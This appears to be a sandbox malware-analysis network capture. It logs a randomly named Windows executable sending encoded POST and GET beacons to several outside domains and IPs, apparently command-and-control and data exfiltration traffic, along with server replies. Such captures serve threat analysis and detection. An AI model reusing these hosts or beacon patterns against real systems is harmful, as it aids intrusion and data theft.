Data Ascii: gP=/3ymXrZusQ/tr+43hOZT9Fmh53AdH8mQkdugANIZzXRbJUfUZFlIEKd2aC8hlFB/vSeWcx20XDC6ncpnExaeZxW3gWJqmB6WuOxsr6UUV07kS+VhdZnG1CoB5ParoyxHFMQXNA/jbZxKC9rnPIrj7m5a7gEcEOhu6YfCJpTsXTcCpGoh3vdlyznCqhwZI7XnZg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.11 | 49983 | 23.224.37.76 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:13.140261889 CEST | 741 | OUT | POST /8z5k/ HTTP/1.1
Host: www.1183377.app
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 219
Origin: http://www.1183377.app
Referer: http://www.1183377.app/8z5k/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Data Ascii: gP=/3ymXrZusQ/txeo3xdxT0Fmi83AdcsmqkdqgANgJyk1bMEvUYAFIFKd2Vi9rqlB2vSTrczi0XHS6nc5nFCCdWBW11GJooh6WuOxsr5o6V0zkTKphd4nJqyoOxvarsyxDFMQhNFXFbb5KC4PnPZrkwm5A2AFvFrE6irqhKaidfgRjoA57nMUyxgvA+HRpBKyuCtbxYEaw0VzdhyicgH5WceQ=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.11 | 49984 | 23.224.37.76 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:15.694778919 CEST | 1754 | OUT | POST /8z5k/ HTTP/1.1
Host: www.1183377.app
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 1231
Origin: http://www.1183377.app
Referer: http://www.1183377.app/8z5k/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Data Ascii: gP=… [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.11 | 49985 | 23.224.37.76 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:18.235976934 CEST | 459 | OUT | GET /8z5k/?gP=y1aGUeBTtCWB8PYjxeZy4U2j9UMFcfikuJGyOOgv6AsofEnOPQxTGp57UW4jl24PiU2QUCC/WnCbrv11FxPlakKzrkp/pGyXsuE4toY6QkeuA/Y2UZTirzw=&-L=kBMxZFRpAD6P HTTP/1.1
Host: www.1183377.app
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.11 | 49986 | 20.184.53.162 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:24.280472040 CEST | 715 | OUT | POST /4i87/ HTTP/1.1
Host: www.52ywq.vip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 199
Origin: http://www.52ywq.vip
Referer: http://www.52ywq.vip/4i87/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Data Ascii: gP=gVdAM/Wp0z6xeOa8v7F4Qu1qsZQ1UVrV16v0Q4FcLUTfSX3I0FyBxjHQIasBhuhWgwXjlO/fbPpFOFy12Z3Dg90aqH1DqIwXcfgsM3PZTIbVxhU8KDEjyXGCED8HcWmlGIMsJZiTWwocjIOaVMHflugM7XJTdf8Xql9ygmJftZ5U24hFoaKeQ+sk+rufHzssxg==
Oct 8, 2024 15:55:25.355673075 CEST | 359 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 08 Oct 2024 13:55:25 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://6329.vhjhbv.com/4i87/
Server: CDNRay
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.11 | 49987 | 20.184.53.162 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:26.821927071 CEST | 735 | OUT | POST /4i87/ HTTP/1.1
Host: www.52ywq.vip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 219
Origin: http://www.52ywq.vip
Referer: http://www.52ywq.vip/4i87/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Data Ascii: gP=gVdAM/Wp0z6xYvK88ot4bu1rxpQ1a1rR16z0Q9kRLGHfS2HI3HaB2jHQD6sEvOgUgwLRlLHfbLJFOAe12ujEht18nn1d3YwXcfgsM3a0TLrVyUc8NRsktnGBNj8HYWm5GIN5JbWpW2scjKGaVZnAwegK/XIRRsRnm0kTrVFCst1Gz+wf45DJTtkmqNPvOCJlqsO9qb1KOkGD4I7JRDrWidI=
Oct 8, 2024 15:55:27.906780005 CEST | 359 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 08 Oct 2024 13:55:27 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://6329.vhjhbv.com/4i87/
Server: CDNRay
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.11 | 49988 | 20.184.53.162 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:29.931057930 CEST | 1748 | OUT | POST /4i87/ HTTP/1.1
Host: www.52ywq.vip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 1231
Origin: http://www.52ywq.vip
Referer: http://www.52ywq.vip/4i87/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Ascii: gP=gVdAM/Wp0z6xYvK88ot4bu1rxpQ1a1rR16z0Q9kRLGffSEPIlgGB3jHQdKsFvOhMgwDVlLDhbNFFcyW1waPEot18431cqIwnceMoM0i0TLrVyVs8ejEk+3GCED8bcWmFGJlpJbTeWGMcjqWaZKPAsOgI4XIzRsd4m0I5rWYpsqxGz78AlKrQAcoA9+jpFwNcifCWqJtoeh/e7JWZFBn+9aqXhAhw9kxJkpSQopunM4ZwFTNcYO0/ddb+gIQz4c+TsQ85icWbR+eISxXOw5MdUAgpMSwuU/L0g7OO13DvwDs6k7wbMR7r4ZHT4zTZ5SLJboSQb4LNN4lZTeBqPFfbMLnt9igmfiUL2EBrPLeOUpN6pmnyo1MtTwD8w4pgzAX02vap/wV0qM60mXIanzQw17PxAVWYrK6M9oya0plFCSLhFhn6VCT9CNctCp/33fFZOjszzb4sYzmcWZ1kjOahaW6vM6/pSxCM+N2982t9QMwy8gv/IA6TQtVrgFJQwcyIV5WWAIo7dN3T9BcCY9ualKi7JMdDaZndr6VXexSsXmvmTBB2SXJOL5zPDvc6m77AWmbsTBmajn8At+E9jZufxgMpXUQ0rZz91wxaUv/xGx91BoMsz42mx6rvtuAlCvgDOs8THir2SXsn20pcnyfsPHsPHZaZSM3Q8B/CoD0fXu84ptGDf5f6K7PUUSGuPSXK0JQ2dM8hefTg+Lhz1jSBAnLUTgGwibkTFtYSFcnmYjdzL3ZGMbQfLpLZrI5fHHHu9kjYJhuGFu3+aRi2S+XwPOXzMWautsf2MPtYglmP4j03SbVz5s9f8ZfILUVX6MCi4RU2OMw9BpkrRvTPo0yYmo4RkxEkvKuclUwWVZW9i6NQ9bBHZG8621tFTlu1Yhog5VItFw3KHEmu8eXAPYAooUCD4Zba570KL+KeboYnu2FnyluwW5kZh/UTOaZnEyeHcfTlu10k0gfi75IjOBy5dBOOY0JB+8QQ5pVnwZJawppUNoXE4 [TRUNCATED]
Oct 8, 2024 15:55:31.023698092 CEST | 359 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 08 Oct 2024 13:55:30 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://6329.vhjhbv.com/4i87/
Server: CDNRay
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.11 | 49989 | 20.184.53.162 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:32.468439102 CEST | 457 | OUT | GET /4i87/?-L=kBMxZFRpAD6P&gP=tX1gPPm4vGDAfdGb/LV0WNIl4Jkrf3fdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVpZIGkHJVy9sLRLBvFWiGcqamlVlCdw8MyQ8= HTTP/1.1
Host: www.52ywq.vip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Oct 8, 2024 15:55:33.552191019 CEST | 499 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 08 Oct 2024 13:55:33 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://6329.vhjhbv.com/4i87/?-L=kBMxZFRpAD6P&gP=tX1gPPm4vGDAfdGb/LV0WNIl4Jkrf3fdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVpZIGkHJVy9sLRLBvFWiGcqamlVlCdw8MyQ8=
Server: CDNRay
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.11 | 49990 | 199.192.21.169 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:39.003246069 CEST | 724 | OUT | POST /d8cw/ HTTP/1.1
Host: www.zenscape.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 199
Origin: http://www.zenscape.top
Referer: http://www.zenscape.top/d8cw/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 2f 69 74 57 33 34 73 62 30 31 4c 6c 48 38 6c 67 47 31 42 6a 63 43 4a 2f 30 33 79 52 48 7a 37 49 37 47 45 6a 6b 4f 2f 32 2b 4b 4e 39 47 7a 68 71 31 41 64 6f 30 39 56 42 71 56 62 38 54 73 65 67 61 63 57 54 54 72 52 73 74 78 4f 6e 4d 6b 58 43 33 69 59 72 70 6c 71 4a 79 71 71 69 75 65 78 2b 6c 44 30 57 41 54 48 31 52 33 62 70 58 4a 39 57 58 50 64 6a 65 67 44 66 6e 4d 33 50 36 49 6e 48 41 45 43 6f 62 7a 68 70 55 73 48 6e 75 67 58 6b 54 50 49 36 7a 44 7a 52 50 2b 6a 64 68 46 2f 38 30 49 38 4e 33 63 51 6f 46 55 30 54 77 6f 61 33 7a 42 57 4d 68 41 31 66 59 33 78 42 6e 7a 2f 48 6e 77 3d 3d
                                                                                                      Data Ascii: gP=/itW34sb01LlH8lgG1BjcCJ/03yRHz7I7GEjkO/2+KN9Gzhq1Ado09VBqVb8TsegacWTTrRstxOnMkXC3iYrplqJyqqiuex+lD0WATH1R3bpXJ9WXPdjegDfnM3P6InHAECobzhpUsHnugXkTPI6zDzRP+jdhF/80I8N3cQoFU0Twoa3zBWMhA1fY3xBnz/Hnw==
Oct 8, 2024 15:55:39.614902020 CEST | 980 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 08 Oct 2024 13:55:39 GMT
                                                                                                      Server: Apache
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Content-Length: 774
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.11 | 49991 | 199.192.21.169 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:42.236865997 CEST | 744 | OUT | POST /d8cw/ HTTP/1.1
                                                                                                      Host: www.zenscape.top
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Origin: http://www.zenscape.top
                                                                                                      Referer: http://www.zenscape.top/d8cw/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 2f 69 74 57 33 34 73 62 30 31 4c 6c 48 66 74 67 41 6d 35 6a 4c 79 4a 38 33 33 79 52 4e 54 37 45 37 47 49 6a 6b 4c 66 6d 72 6f 70 39 47 58 6c 71 6e 52 64 6f 33 39 56 42 6c 31 62 35 58 73 65 76 61 63 71 62 54 75 70 73 74 78 61 6e 4d 68 72 43 33 78 67 6f 6f 31 71 50 37 4b 71 67 78 75 78 2b 6c 44 30 57 41 54 53 51 52 33 7a 70 55 35 4e 57 57 75 64 73 43 77 44 63 33 73 33 50 78 6f 6e 44 41 45 43 65 62 32 46 44 55 75 76 6e 75 6c 7a 6b 64 2b 49 35 35 44 7a 66 46 65 69 6a 6b 48 66 79 30 6f 78 64 77 75 78 61 53 41 41 76 38 4f 4c 74 6a 69 66 62 69 54 39 64 4d 52 51 78 75 43 61 4f 38 34 63 57 74 75 47 33 54 31 6b 53 71 4a 4c 4b 65 73 57 37 46 39 34 3d
                                                                                                      Data Ascii: gP=/itW34sb01LlHftgAm5jLyJ833yRNT7E7GIjkLfmrop9GXlqnRdo39VBl1b5XsevacqbTupstxanMhrC3xgoo1qP7Kqgxux+lD0WATSQR3zpU5NWWudsCwDc3s3PxonDAECeb2FDUuvnulzkd+I55DzfFeijkHfy0oxdwuxaSAAv8OLtjifbiT9dMRQxuCaO84cWtuG3T1kSqJLKesW7F94=
Oct 8, 2024 15:55:42.829372883 CEST | 980 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 08 Oct 2024 13:55:42 GMT
                                                                                                      Server: Apache
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Content-Length: 774
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.11 | 49992 | 199.192.21.169 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:44.786650896 CEST | 1757 | OUT | POST /d8cw/ HTTP/1.1
                                                                                                      Host: www.zenscape.top
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 1231
                                                                                                      Origin: http://www.zenscape.top
                                                                                                      Referer: http://www.zenscape.top/d8cw/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 2f 69 74 57 33 34 73 62 30 31 4c 6c 48 66 74 67 41 6d 35 6a 4c 79 4a 38 33 33 79 52 4e 54 37 45 37 47 49 6a 6b 4c 66 6d 72 6f 68 39 46 6b 39 71 31 69 46 6f 34 64 56 42 73 56 62 34 58 73 65 32 61 63 79 6c 54 76 55 5a 74 33 57 6e 44 6a 54 43 67 51 67 6f 69 31 71 50 32 71 71 74 75 65 78 52 6c 44 6b 53 41 54 43 51 52 33 7a 70 55 37 56 57 41 50 64 73 41 77 44 66 6e 4d 32 4f 36 49 6e 6e 41 45 36 4f 62 33 45 30 58 66 50 6e 75 46 6a 6b 66 4d 67 35 78 44 7a 64 43 65 69 72 6b 48 53 77 30 6f 74 52 77 75 6f 50 53 48 30 76 32 4b 61 53 37 41 72 54 31 69 35 51 53 51 63 6c 70 42 71 32 32 4a 4d 51 71 38 4b 42 4e 46 30 43 75 71 6d 59 43 65 36 42 5a 64 39 51 49 67 67 37 54 4d 73 61 62 39 47 34 6e 62 58 66 5a 55 62 64 36 49 53 54 46 43 55 5a 4b 42 76 37 37 55 79 46 70 43 32 33 53 45 74 45 75 76 58 6b 62 49 74 70 6b 52 4e 74 67 71 33 35 47 6a 52 48 39 4c 70 50 6e 51 59 6a 70 74 54 74 42 59 30 68 46 70 75 59 6f 75 55 39 53 7a 73 39 67 4e 33 50 76 75 63 48 56 57 2b 6b 56 72 61 63 49 76 79 51 73 34 77 45 49 52 34 [TRUNCATED]
                                                                                                      Data Ascii: gP=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 [TRUNCATED]
Oct 8, 2024 15:55:45.444499969 CEST | 980 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 08 Oct 2024 13:55:45 GMT
                                                                                                      Server: Apache
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Content-Length: 774
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.11 | 49993 | 199.192.21.169 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:47.331054926 CEST | 460 | OUT | GET /d8cw/?gP=ygF20N1+ik7kBOtBXXgSSDl+0mvoPS6R8XEst5j0lvkfFXMCnxh1w4hdkVa8euGiR7K2W9wNoXO2NDH8py5otm2v66eMoudDkD1QDiauZF6PALhNXvt3BHI=&-L=kBMxZFRpAD6P HTTP/1.1
                                                                                                      Host: www.zenscape.top
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Oct 8, 2024 15:55:47.945543051 CEST | 995 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 08 Oct 2024 13:55:47 GMT
                                                                                                      Server: Apache
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Content-Length: 774
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=utf-8
